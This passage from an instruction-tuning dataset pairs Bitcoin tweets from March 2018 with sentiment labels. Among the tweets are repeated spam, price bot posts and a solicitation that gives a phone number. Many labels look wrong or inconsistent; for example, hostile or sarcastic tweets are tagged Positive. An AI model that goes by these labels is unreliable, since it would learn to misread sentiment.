or both.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Celebrate birthday and take interesting prizes with @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Should be buy Tron or not?\n #trx #tron #altcoins #cryptocurrency #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Only diet Bitcoin Cash Lite will be left after all the rubble of Vers massive poop dumps is through.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypto_capone Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Satoshi's genius was building a system that didn't need him to be succesful.\n\nBitcoin is self-sufficient.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano but what if someone killed all the bitcoin developers?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Satoshi Nakamoto as banned the project of bitcoin in 2015. So making money off a dead coin pure trolling!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCamel1 @MoonOverlord I hate to tell you this... but even 10,000 50k+ follower accounts don't make 24k bitcoin volume.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin #elliot 5th wave coming with squeeze over 9200", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ashleyfeinberg will you throw me a party with your bitcoin money to unveil", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@buzzshownetwork \nThis project is great\n#Bitcoin #ICO #BTC #ETH #YouTube", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@brian_lovin @ruzannaroz If someone can tell me a quick shortcut for the degrees symbol I\u2019ll give you all the Bitcoin I own", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mybtcnig I'm from China. I need a lot of gift card and bitcoin. 
Can you see the price list of your goods?\nMy whatsapp:+8618678303679", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@option_snipper For a second I thought the chart belongs to bitcoin LOL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dry_Observer @DrDenaGrayson @ericgarland what are the references to bitcoin? i must\u2019ve missed this connection.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "how many out there have applied the Ichimoku Cloud to trading #bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@xkeepah @illusionfoxe not to mention, that recent report that talked about how every bitcoin(?) contains CP", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8650.44\nEthereum:$534.767\nBitcoin Cash:$1010.69\nLitecoin:$162.129\nRipple:$0.650947\nIOTA:$1.31849", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8650.44 / 7021.129\u20ac\n1 bitcoin-cash = $1007.59 / 817.81\u20ac\n1 ethereum = $534.767 / 434.043\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8557.49@bitstamp. High $9099.590. Low $8503.520. Market Cap $144.899 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AndrewQuackson The Bolton move was set up by Barron for bitcoin gainz.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003330 (-0.00000044) #BTC / 0.286412 (-0.00641) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077699 (-0.00001417) #BTC / 6.69056 (-0.17639) #USD. Market rank is 7. 
#eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002276 (-0.00000021) #BTC / 0.195699 (-0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0472481 (-0.00022870) #BTC / 406.329 (-5.75100) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004793 (-0.00000036) #BTC / 0.412197 (-0.00752) #USD. Market rank is 114. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8704.67 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What\u2019s up with them bitcoin wallets... y\u2019all been quiet lately.. talk to me", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u269c Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge isn't he the guy who put the Child Porn on Bitcoin blockchain?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8644.33 as of Thu Mar 22 20:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mohsen1987 @BTCTN Time to unsubscribe from Roger controlled Twitter account @BTCTN #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thealicemoon twitter, instagram, my bike apps, and all my bitcoin apps LOLz", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay @Altcoinbuzzio So why is bitcoin such a shithead?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is based on #blockchain. A public ledger of transactions that's safe, huge potential to be future currency. #bitcoinminer", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:31:58 2018 (18:26)\nUSD : 8596.62\nWght: 0.43\nBlk#: 514746\nSize: 924.5 KB\nTXs: 2069\nPool: 47 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JessicaHuseman He's going to create a bitcoin-economy sovereign nation Web site called Bannsylvania?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin: the movie", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ezbreh @altcointhoreau easy.. 
sell house when 3k and buy more bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC #bitcoin \nScalp trade entered: $8580", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thecryptokidd @rogerkver @Falkvinge Be carefull, bitcoin ticker is not $BCH, that's the ticker for bcash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000048e6d5fc56c1eb43530236193bd8bec8101caf8f2befd7 mined at height 514746.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @rocketman_ai you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect RocketMan much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rawnstet I didn't know you were into bitcoin!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Go home, Bitcoin, you\u2019re drunk.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Never bring up #bitcoin during a bachelor party...... @skutty21 @stvnclmnt @Sussy28", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin -- to all you traders prolonging progress. Time to let it fall and the market to consolidate. #letitfall", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! 
This is how says Bethereum #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2604 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What will the eventual, full-blown, Hollywood movie about Bitcoin be called? \n\nMy guess:\n\n\"Holders\"\n\n#BTC #cryptocurrencies", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8666.39.\nThe current price of BCash is $1007.41, or 0.116903 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptorick_ That's the only reason Bitcoin exists..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.\n\nTwo-time preference.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MrHodl @rogerkver @Falkvinge #Bitcoin touched @rogerkver somewhere, that is why he hates it. All makes sense now.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin news sentiment changed to Negative in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It is a exiting news. 
I hope it will be a great project.\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Correcting wrong or strange Kanji Tattoo designs.\n1 revision \uff1d 0.00005bitcoin\nGive me DM or reply.\n#Japanese #Kanji #tattoo #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin as a response to Woke Capital ascending to banking infrastructure. God Bless programming", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-KORE AskRate: 0.00035205 #Bittrex #KORE $KORE #Kore #altcoin #bitcoin #cryptocurrencies\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8631.56 / 7005.805\u20ac\n1 bitcoin-cash = $1007.08 / 817.396\u20ac\n1 ethereum = $533.447 / 432.972\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ready Player One is a synonym for bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Yes, I'm reading all the updated exchange TOU's. But I'm sure as hell not liking it. #bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TradeSatoshi Deposited some bitcoin a couple of hours ago. 
Still hasn\u2019t shown!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --39.23%, ($-5558.76) [Currently $8611.245] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@fixcars *the evolved bitcoin markets*", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cityof Atlanta has a cyber attacker?\nlocked them out of accounts for ransom in bitcoin or sumn lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@monkeytwn Make 10, buy 10 bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I\u2019d also conservatory estimate 22.5% bitcoin dominance which is 30K. 
If $btc dominance is 40% it\u2019s 50K", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@stephanlivera I always bribe politicians in Bitcoin!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "*remembers having millions of neopoints on account*\n\n...\n\nalexa are neopoints and bitcoin the same thing", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please help our Crypto Community continue to grow!! \u2693\ufe0f\ud83d\udc99 Follow us @Crypt0_Couple!! #Litecoin #bitcoin #help #SOS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8598.665", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, How to Choose the Best Forex Broker For You...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@coindesk Would be curious to see how this actually works #btc #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Robot can tell the price movements in the next few seconds, that's why it's easy to win much money very fast. #BestEA #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Stephen81183184 @YouTube Lol the guys does bad investment on bitcoin, and tries to gives some on Linda. 1000x!!! Where do i sign lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8630.0 / 7004.539\u20ac\n1 bitcoin-cash = $1005.0 / 815.708\u20ac\n1 ethereum = $533.418 / 432.948\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Using my telepathic powers to make bitcoin violate this 1H bear flag. You\u2019ll see.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ericgarland Was Bitcoin involved in the laundering of campaign money.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ruzannaroz @brian_lovin That\u2019s the one! You win all my bitcoin! 
Sorry that I don\u2019t own any....", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jaykelly26 \ud83d\udc4dBBC is much more trustworthy I still don't understand shite about bitcoin tho", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ericgarland Was Bitcoin involved in the laundering of campaign money?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Delete Facebook, become a walking bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance @brazvan93 I can't wait for the day where Bitcoin is resilient enough to shrug off bullshit like this.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Trader_Dante Am only interested in your 24k gold bitcoin toilet flush button", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8604 / \u20ac6974 / \u00a36092 @ Block 514746. \nMarket Cap: 147.33B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is on its way to be at 7k or lower in a couple of days. XRP can go to 0.51 #Btc #bitcoin #Crypto #XRP #Ripple", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wow my tweet is getting deleted about @usbank not processing crypto transactions? What\u2019s actually going on... \n\n#crypto\n#BTCUSD \n#bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@el33th4xor Theres plenty - however, they only take legitimate Bitcoin. Not Btrash. 
Unlucky for you.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is an automated third party.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@matthiasochs13 @LaneSnyder22 he's working with responsive blockchain artificial intelligence and gets paid in bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My goal is to inspire a new generation of Bitcoin shitposters, so I can fade away and dissappear into the background....", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Increasing the Bitcoin blocksize was the most important step, but it's one among many.\"\n\n- Emin G\u00fcn Sirer @Satoshis_Vision Conference", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@el33th4xor 'hey all look at me im a nice guy donating to charity with Bitcoin Cash - see, we're the good guys'. You make me sick.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is simply an automated third party.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I feel that bitcoin is ridiculous and that's excellent", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "nerds still screeching about Bitcoin on my TL \ud83e\udd2a\ud83e\udd2a\ud83e\udd2a", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ecuador the only country in the world where you can buy real estate with BTC and ETH contact me. 
@Bitcoin @ethereum @bitcoingold @BITCOlN", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "third speaker @Satoshis_Vision @el33th4xor \n\n#BitcoinNG\n\"a roadmap for how I believe #bitcoin can scale.\"", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Have you invested in Bitcoin or any other cryptocurrency?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace.\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This coin exchange crap is dumb.\nExchange burn - 1/1 crap \nDoes bitcoin or Litecoin do this crap. Not easy for all of us to exchange", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alamin24 @Bitcoin It will be more advanced in the future!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sabrina_nellie_ Bitcoin or another cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zucando ??? I love #bitcoin #ethereum and #Litecoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28551.67 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Good question: which has more attributes of money or currency -- Bitcoin, or Amazon gift cards? Its close call.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8611.88 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,633.16, market cap of $146,196,624,986 (44.07%), and 24 hr vol. of $5,424,050,000 (37.37%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 07:00PM #Bitcoin Price:\nUSD 8732.51 | EUR 7060.80 | JPY 933609.45", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,633.16\nChange in 1h: -0.85%\nMarket cap: $146,196,624,986.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,611.88, EUR 6,990.94", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8633.16\nEthereum:$534.243\nBitcoin Cash:$1003.27\nLitecoin:$162.158\nRipple:$0.650443\nIOTA:$1.31164", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.12% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8643.3 / 7015.334\u20ac\n1 bitcoin-cash = $1003.27 / 814.304\u20ac\n1 ethereum = $534.243 / 433.618\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of 
the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PardonMyTake Are we still supporting bitcoin 2 gen now", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8633.16 1.00000BTC \n1h: -0.85% \ud83d\udd3b \n1d: -4.71% \ud83d\udd3b \n7d: +4.90% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,424,050,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8584.17/$8586.66 #Bitstamp\n$8583.54/$8591.87 #Kraken\n\u21e2$-3.12/$7.70\n$8559.49/$8645.52 #Coinbase\n\u21e2$-27.17/$61.35", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Should you buy or sell today? Check our YouTube channel! We analyze over 30 pairs, also Gold, Silver, Oil and Bitcoin! #LowRisk", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004854 (+0.00000061) #BTC / 0.417313 (+0.00512) #USD. Market rank is 112. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002266 (-0.00000010) #BTC / 0.194882 (-0.00082) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8618.00 | -0.0082%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0472347 (-0.00001340) #BTC / 406.28 (-0.04900) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.0007845 (+0.00000751) #BTC / 6.74772 (+0.05716) #USD. Market rank is 7. 
#eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003374 (+0.00000044) #BTC / 0.290085 (+0.00367) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 02:00 UTC Bitcoin Price: 8608.76 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,593.00 v #BitcoinCash $999.26 (BTC/BCH 8.6), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 11:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano brother can you please give me the definitive source for someone who knows nothing on bitcoin and would like to know everything?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8584.17 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.12 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BarroniBaloney @synningsaint @Bella_ofA @BelleReaver Oh & about that bitcoin bounty.....", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@silveragorism @Bitcoin @signalapp @myWickr @Samsung @tipprbot Thank you so much for the support!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn 
bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u203c\ufe0f$BTC\u203c\ufe0f Bitcoin is now $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of $Bitcoin is $8584.17 via #Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8584.17 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8584.17 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8643.30 Down -$77.72 -0.90% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004a17ad7123b0eae9c15cabf7951ad24c44dba46ec20606 mined at height 514747.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:03:26 